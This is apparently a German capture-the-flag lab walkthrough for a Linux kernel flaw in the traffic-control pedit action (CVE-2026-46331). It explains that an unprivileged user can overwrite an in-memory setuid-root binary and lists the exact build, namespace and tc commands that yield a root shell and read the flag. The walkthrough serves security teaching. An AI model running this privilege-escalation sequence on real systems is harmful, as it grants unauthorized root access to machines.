
Beschreibung und Ausnutzungsschritte für die pedit COW-Sicherheitslücke (CVE-2026-46331)
Ausarbeitung und Exploitationsschritte für die pedit-COW-Schwachstelle (CVE-2026-46331).
Diese Herausforderung demonstriert pedit COW, einen Linux-Kernel-Fehler in der Paketbearbeitungsaktion (act_pedit) des Traffic-Control-Subsystems. Die Schwachstelle ermöglicht es einem unprivilegierten Benutzer, eine In-Memory-Kopie einer Setuid-Root-Binärdatei zu überschreiben und so effektiv eine Root-Shell zu erhalten, ohne jemals die Datei auf der Festplatte zu berühren.
Die Umgebung startet als unprivilegierter Benutzer (karen).
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
# Clean up any existing configurations if needed
tc qdisc del dev lo clsact
# Setup the qdisc and filter
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}